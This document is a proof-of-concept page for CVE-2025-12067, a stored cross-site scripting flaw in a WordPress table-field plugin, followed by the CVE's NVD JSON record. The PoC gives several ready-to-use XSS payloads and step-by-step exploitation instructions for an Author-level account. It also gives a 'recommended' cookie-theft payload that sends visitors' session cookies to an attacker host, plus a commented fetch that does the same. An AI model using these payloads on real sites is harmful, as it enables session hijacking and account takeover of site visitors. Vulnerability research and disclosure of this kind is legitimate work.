CVE-2025-12067

<!-- CVE-2025-12067 PoC: Stored XSS in Table Field Plugin --> <!-- Requires WordPress account with Author-level permissions or higher --> <!-- PoC Method 1: Using script tag --> <script> // Malicious JavaScript payload // This will execute when any user views the affected page console.log('XSS Triggered'); // Example: Steal session cookies var stolenCookies = document.cookie; // Example: Send stolen data to attacker-controlled server // fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolenCookies)); </script> <!-- PoC Method 2: Using img onerror event --> <img src=x onerror="alert('Stored XSS - CVE-2025-12067')"> <!-- PoC Method 3: Using SVG element --> <svg/onload=alert(document.domain)> <!-- PoC Method 4: Using body onload event --> <body onload=alert('CVE-2025-12067 XSS')> <!-- Exploitation Steps: 1. Authenticate to WordPress with Author+ account 2. Navigate to post/page editor 3. Add a Table Field (ACF or SCF) 4. Insert malicious payload in any table cell 5. Save/publish the content 6. Any user visiting the page will trigger the XSS --> <!-- Recommended Payload for Cookie Theft --> <script> new Image().src='https://attacker.example/log?c='+encodeURIComponent(document.cookie); </script>

{"cve": {"id": "CVE-2025-12067", "sourceIdentifier": "[email protected]", "published": "2026-01-06T08:15:51.490", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Table Field Add-on for ACF and SCF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Cell Content in all versions up to, and including, 1.3.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Table Field Add-on for ACF and SCF para WordPress es vulnerable a cross-site scripting almacenado a través del contenido de la celda de la tabla en todas las versiones hasta la 1.3.30, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes autenticados, con acceso de nivel de Autor y superior, inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3386339/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93f80716-a95b-49fc-805f-446d4723ca77?source=cve", "source": "[email protected]"}]}}